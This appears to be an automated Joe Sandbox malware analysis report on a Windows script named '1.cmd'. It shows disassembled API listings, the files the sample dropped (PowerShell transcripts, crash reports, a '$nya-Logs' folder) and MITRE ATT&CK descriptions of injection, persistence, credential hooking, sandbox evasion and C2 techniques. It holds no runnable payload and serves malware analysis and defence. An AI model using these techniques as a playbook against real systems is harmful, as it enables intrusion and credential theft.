RtlPcToFileHeader.NTDLL ref: 0000017C6DD791C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,0000017C6DD787F7), ref: 0000017C6DD79209

Strings

csm, xrefs: 0000017C6DD791F6

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: a50866fabe839986006eb03e309947d3da57004b0bcf7698e8dfbb17f2668ce8
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 4611FB32618B8082EB619B15F484299B7F5F788B94F584669EF8D07B64DF3CC5E1CB40

Function 0000017C6DD71D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000017C6DD71D69
HeapAlloc.KERNEL32 ref: 0000017C6DD71D77
GetProcessHeap.KERNEL32 ref: 0000017C6DD71D9C
HeapFree.KERNEL32 ref: 0000017C6DD71DAA

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: d469282c332aae85d1324053fa1d6e591f176e669ca5b9e5e49084d4674388d9
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: 3B116D31A15B8085EE15EB67A8482A977B0F788FD1F585168EF4E53765EF38D4C28380

Function 0000017C6DD71264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000017C6DD7126A
HeapAlloc.KERNEL32 ref: 0000017C6DD71279
GetProcessHeap.KERNEL32 ref: 0000017C6DD71293
HeapAlloc.KERNEL32 ref: 0000017C6DD712A4

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: fd03b2d5571894d0994852eeb2c30556405b58196b7d8eb11949d64c9d6e7055
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: E3E092316016049AEB15AF63D8483A936F1FB8CF06F44C028CA0E07350EF7D84D9C7A0

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1.cmd

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_dc34baa62d94b1453e37c8fdf4c57a0ef7376b6_e3b0f337_417091be-de45-467f-8e85-c1d043a96f39\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_dc34baa62d94b1453e37c8fdf4c57a0ef7376b6_e3b0f337_89cc5d61-6f0a-4952-9c41-c653d503300c\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER643A.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6804.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6863.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8767.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8B21.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8B41.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1kp2q3ph.fnd.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3cbg0plj.2iz.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k1jt3rpj.xty.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4rvt4yh.cwz.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xgm21jyh.gw0.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xhngrita.jzm.psm1

C:\Users\user\AppData\Roaming\$nya-Logs\2024-10-04

C:\Users\user\Documents\20241003\PowerShell_transcript.745481.9_jseo4K.20241003232422.txt

Windows Analysis Report
1.cmd

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre